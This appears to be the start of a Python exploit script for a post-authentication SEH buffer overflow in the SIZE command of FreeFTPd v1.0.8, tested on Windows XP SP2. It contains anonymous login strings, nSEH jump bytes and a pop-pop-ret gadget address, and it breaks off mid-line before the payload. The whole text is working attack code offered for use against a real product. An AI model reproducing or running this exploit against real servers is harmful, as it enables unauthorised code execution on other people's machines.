#!/usr/bin/env python """ Description: Post-Authenticated Buffer Overflow via "SIZE" Command in FreeFTPd v1.0.8 Author: Cody Winkler Contact: @c2thewinkler (twitter) Date: 11/26/2019 Tested On: Windows XP SP2 EN [+] Usage: python expoit.py $ python exploit.py 127.0.0.1 21 """ import socket from struct import pack import sys host = sys.argv[1] port = int(sys.argv[2]) username = "USER anonymous\r\n" password = "PASS test\r\n" nSEH = "\x90\x90\xeb\x04" # 0x7ffc0519 : pop edi # pop edi # ret | {PAGE_READONLY} SEH = pack("